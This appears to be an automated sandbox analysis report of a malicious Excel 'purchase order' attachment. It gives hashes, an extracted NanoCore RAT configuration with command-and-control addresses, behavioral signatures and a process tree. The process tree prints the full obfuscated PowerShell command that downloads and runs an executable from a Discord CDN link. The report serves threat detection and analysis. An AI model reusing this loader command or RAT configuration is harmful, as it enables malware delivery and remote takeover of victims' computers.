Analysis
-
max time kernel
77s -
max time network
160s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
22-03-2021 17:39
Static task
static1
Behavioral task
behavioral1
Sample
Purchase OrderDated19032021.xls
Resource
win7v20201028
General
-
Target
Purchase OrderDated19032021.xls
-
Size
81KB
-
MD5
1a49fe1a9c135ccd9c9f2d9cf395f378
-
SHA1
24d6ab599cef554a8e8e6b2e3abffb7072e6e1db
-
SHA256
e4d560c489dba28369b781106a1334767ff82bb44b69b9e4cc6d068feb29ab6b
-
SHA512
9659a2da6cebb7d4beec1142f0a04030ce0abf08cbf75899dc903115e8160d4277429f2a23d06dcc55c1477424e8333fe8990b7a42de3c06eae2561ae3a263b3
Malware Config
Extracted
https://cdn.discordapp.com/attachments/814408945828626445/822323767334273094/VEqScSTKqHP3LQI.exe
Extracted
nanocore
1.2.2.0
185.140.53.130:2364
mydnsnanocore123.ddns.net:2364
af625c00-d1f5-4435-80be-9f676efc59dc
-
activate_away_mode
true
-
backup_connection_host
mydnsnanocore123.ddns.net
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2020-12-27T15:43:00.135192036Z
-
bypass_user_account_control
true
- bypass_user_account_control_data
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
2364
-
default_group
17-03-2021NANO
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
af625c00-d1f5-4435-80be-9f676efc59dc
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
185.140.53.130
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
true
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1444 1280 Powershell.exe -
Blocklisted process makes network request 1 IoCs
Processes:
Powershell.exeflow pid process 6 1444 Powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
vjkEWrcAR.exepid process 1192 vjkEWrcAR.exe -
Drops file in System32 directory 1 IoCs
Processes:
Powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk Powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
vjkEWrcAR.exedescription pid process target process PID 1192 set thread context of 344 1192 vjkEWrcAR.exe MSBuild.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Office loads VBA resources, possible macro or embedded object present
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Processes:
EXCEL.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1032 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
Powershell.exeMSBuild.exepid process 1444 Powershell.exe 1444 Powershell.exe 344 MSBuild.exe 344 MSBuild.exe 344 MSBuild.exe 344 MSBuild.exe 344 MSBuild.exe 344 MSBuild.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
MSBuild.exepid process 344 MSBuild.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
Powershell.exeMSBuild.exedescription pid process Token: SeDebugPrivilege 1444 Powershell.exe Token: SeDebugPrivilege 344 MSBuild.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
EXCEL.EXEpid process 1032 EXCEL.EXE 1032 EXCEL.EXE 1032 EXCEL.EXE -
Suspicious use of WriteProcessMemory 17 IoCs
Processes:
Powershell.exevjkEWrcAR.exedescription pid process target process PID 1444 wrote to memory of 1192 1444 Powershell.exe vjkEWrcAR.exe PID 1444 wrote to memory of 1192 1444 Powershell.exe vjkEWrcAR.exe PID 1444 wrote to memory of 1192 1444 Powershell.exe vjkEWrcAR.exe PID 1444 wrote to memory of 1192 1444 Powershell.exe vjkEWrcAR.exe PID 1192 wrote to memory of 1792 1192 vjkEWrcAR.exe schtasks.exe PID 1192 wrote to memory of 1792 1192 vjkEWrcAR.exe schtasks.exe PID 1192 wrote to memory of 1792 1192 vjkEWrcAR.exe schtasks.exe PID 1192 wrote to memory of 1792 1192 vjkEWrcAR.exe schtasks.exe PID 1192 wrote to memory of 344 1192 vjkEWrcAR.exe MSBuild.exe PID 1192 wrote to memory of 344 1192 vjkEWrcAR.exe MSBuild.exe PID 1192 wrote to memory of 344 1192 vjkEWrcAR.exe MSBuild.exe PID 1192 wrote to memory of 344 1192 vjkEWrcAR.exe MSBuild.exe PID 1192 wrote to memory of 344 1192 vjkEWrcAR.exe MSBuild.exe PID 1192 wrote to memory of 344 1192 vjkEWrcAR.exe MSBuild.exe PID 1192 wrote to memory of 344 1192 vjkEWrcAR.exe MSBuild.exe PID 1192 wrote to memory of 344 1192 vjkEWrcAR.exe MSBuild.exe PID 1192 wrote to memory of 344 1192 vjkEWrcAR.exe MSBuild.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Purchase OrderDated19032021.xls"1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell $cqhsGtEhW='*.*-EX'.replace('*.*-','I'); sal bsbqkQGmN $cqhsGtEhW;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://cdn.discordapp.com/attachments/814408945828626445/822323767334273094/VEqScSTKqHP3LQI.exe'',$env:temp+''\''+''vjkEWrcAR.exe'')'|bsbqkQGmN; start-process($env:temp+'\'+'vjkEWrcAR.exe')1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\vjkEWrcAR.exe"C:\Users\Admin\AppData\Local\Temp\vjkEWrcAR.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\neodsN" /XML "C:\Users\Admin\AppData\Local\Temp\tmp3B6B.tmp"3⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"{path}"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\tmp3B6B.tmpMD5
6aa71ffda61bad08c679ff3105f3d54a
SHA19429dcabb7b4d43c5579a65bc51d6808fdb82e25
SHA25616a2ab859f39767918b579699f12e6b2ec23a4ce561a59441492f47cfaac3285
SHA512b7479034dd68be51382a851ee3e238df4fd7a0bb982e85f98a76df881f08fc3147a0a9dc39be18a804f58457ffc88b784518507afdd23975c3c5a66fa6453304
-
C:\Users\Admin\AppData\Local\Temp\vjkEWrcAR.exeMD5
894aea17779959eecac3bd54d66844a1
SHA129e6388dbf891443bbc5a1e503a539a2586e6868
SHA2568a84d3c7b92924049e47d255f7f2243e3856c7b4425f671abc269c41ad0f53a9
SHA512bf06f689de1d89e7ea7fe9841db889496d77fb5ab6d538ce53d1bf27a8274d7e2b0bb4744f84f8940393a0dd3673ef3993b9af364ca6b7afb94fbf5d89c95964
-
C:\Users\Admin\AppData\Local\Temp\vjkEWrcAR.exeMD5
894aea17779959eecac3bd54d66844a1
SHA129e6388dbf891443bbc5a1e503a539a2586e6868
SHA2568a84d3c7b92924049e47d255f7f2243e3856c7b4425f671abc269c41ad0f53a9
SHA512bf06f689de1d89e7ea7fe9841db889496d77fb5ab6d538ce53d1bf27a8274d7e2b0bb4744f84f8940393a0dd3673ef3993b9af364ca6b7afb94fbf5d89c95964
-
memory/344-40-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/344-43-0x0000000000B80000-0x0000000000B81000-memory.dmpFilesize
4KB
-
memory/344-41-0x000000000041E792-mapping.dmp
-
memory/344-44-0x0000000000B81000-0x0000000000B82000-memory.dmpFilesize
4KB
-
memory/1032-2-0x000000002F291000-0x000000002F294000-memory.dmpFilesize
12KB
-
memory/1032-4-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1032-3-0x0000000071281000-0x0000000071283000-memory.dmpFilesize
8KB
-
memory/1192-32-0x0000000000000000-mapping.dmp
-
memory/1192-37-0x0000000000651000-0x0000000000652000-memory.dmpFilesize
4KB
-
memory/1192-36-0x0000000000650000-0x0000000000651000-memory.dmpFilesize
4KB
-
memory/1192-35-0x0000000076241000-0x0000000076243000-memory.dmpFilesize
8KB
-
memory/1444-9-0x00000000025A0000-0x00000000025A1000-memory.dmpFilesize
4KB
-
memory/1444-12-0x00000000025D0000-0x00000000025D1000-memory.dmpFilesize
4KB
-
memory/1444-31-0x000000001C360000-0x000000001C361000-memory.dmpFilesize
4KB
-
memory/1444-29-0x000000001A8C0000-0x000000001A8C1000-memory.dmpFilesize
4KB
-
memory/1444-17-0x000000001A860000-0x000000001A861000-memory.dmpFilesize
4KB
-
memory/1444-14-0x000000001A830000-0x000000001A831000-memory.dmpFilesize
4KB
-
memory/1444-13-0x000000001C1D0000-0x000000001C1D1000-memory.dmpFilesize
4KB
-
memory/1444-30-0x000000001A8D0000-0x000000001A8D1000-memory.dmpFilesize
4KB
-
memory/1444-11-0x000000001AB14000-0x000000001AB16000-memory.dmpFilesize
8KB
-
memory/1444-5-0x000007FEFB9D1000-0x000007FEFB9D3000-memory.dmpFilesize
8KB
-
memory/1444-10-0x000000001AB10000-0x000000001AB12000-memory.dmpFilesize
8KB
-
memory/1444-8-0x000000001AB90000-0x000000001AB91000-memory.dmpFilesize
4KB
-
memory/1444-7-0x00000000023D0000-0x00000000023D1000-memory.dmpFilesize
4KB
-
memory/1444-6-0x000007FEF5180000-0x000007FEF5B6C000-memory.dmpFilesize
9.9MB
-
memory/1792-38-0x0000000000000000-mapping.dmp